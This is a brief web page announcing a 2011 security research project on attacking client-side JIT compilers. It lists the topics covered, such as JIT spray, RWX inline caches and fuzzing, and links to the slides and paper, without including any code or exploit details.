Attacking Client Side JIT Compilers

JIT engines are everywhere. The browser you are reading this page with contains at least one JIT. These complex software components greatly affect the security of the applications that use them.

 

Our research focused on a number of different areas:

 

  • An overview of the LLVM and Firefox JIT engines
  • Unintended code emission bugs
  • Inline caches and the weak (RWX) memory permissions they demand
  • Reusable JIT emitted code sequences at predictable locations (ROP gaJITs)
  • JIT spray attacks on other JIT engines through floating point values
  • Blind execution through overwriting JIT page contents
  • JIT Page inline meta data attacks
  • JIT Protection techniques and the JITs that utilize them
  • Our jitter tool chain and grammar fuzzers for finding JIT bugs

You can download our slides and research paper below:

Download the Slides

Download the Presentations

Published date:  05 August 2011

comments powered by Disqus